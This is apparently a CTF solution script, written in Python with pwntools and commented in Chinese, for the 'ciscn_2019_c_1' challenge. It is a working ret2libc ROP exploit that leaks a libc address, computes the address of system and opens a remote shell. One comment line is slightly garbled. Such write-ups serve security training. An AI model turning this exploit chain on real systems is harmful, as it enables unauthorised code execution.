# encoding=utf-8
from pwn import *
from LibcSearcher import *
sh = remote('node3.buuoj.cn',29416)
# sh = process('./ciscn_2019_c_1')
# sh = remote('node3.buuoj.cn', 28271)
# ELF模塊用於獲取ELF文件的信息
elf = ELF('./ciscn_2019_c_1')
# 分析 ELF
# context.log_level = 'deb3# start = 0x400B28
start = elf.sym['main']
# 0x400b28-->main函數的起始地址
rdi_addr = 0x0000000000400c83
# ROPgadget --binary ciscn_2019_c_1 | grep "pop rdi"
# 64位的 函數調用時 前六個參數是通過rdi,rsi,rdx,rcx,r8 和 r9進行傳遞的
# gadget
# 字面意思為“小工具”,如果把某個程序比喻成汽車,那么gadget就相當於拆車的工具,依靠它,我們就可以“突破”程序的限制,執行我們希望執行的代碼。
# 找到各個函數的plt和got
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
gets_got = elf.got['gets']
# log.success('puts_plt => {}'.format(hex(puts_plt)))
# log.success('gets_got => {}'.format(hex(gets_got)))
# log.success('puts_got => {}'.format(hex(puts_got)))
# 知識點:
# Linux的程序中使用了延遲綁定機制,也就是說一個函數在沒有執行前,你是不知道它的真實地址是什么的
# system 函數屬於 libc,而 libc.so 動態鏈接庫中的函數之間相對偏移是固定的。
# 即使程序有 ASLR 保護,也只是針對於地址中間位進行隨機,最低的 12 位並不會發生改變
sh.sendlineafter('choice!\n', '1')
payload1 = 'a' * 88 + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(start)
# s->0x50+r->0x8=0x58=88
sh.sendline(payload1)
gdb.attach(sh)
# 在指定process之后可以attach上去調試,配合proc模塊就可以得到對應進程的pid非常方便。
sh.recvuntil('@')
sh.recvline()
puts_leak = u64(sh.recvline()[:-1].ljust(8, '\0'))
# log.success('puts_leak_addr => {}'.format(hex(puts_leak)))
libc = LibcSearcher('puts', puts_leak)
libc_base = puts_leak - libc.dump('puts')
sys_addr = libc_base + libc.dump('system')
bin_sh_addr = libc_base + libc.dump('str_bin_sh')
# log.success('libc_base_addr => {}'.format(hex(libc_base)))
# log.success('system_addr => {}'.format(hex(sys_addr)))
# log.success('bin_sh_addr => {}'.format(hex(bin_sh_addr)))
sh.sendlineafter('choice!\n', '1')
payload2 = 'a' * 88 + p64(rdi_addr) + p64(bin_sh_addr) + p64(sys_addr)
sh.sendline(payload2)
sh.interactive()
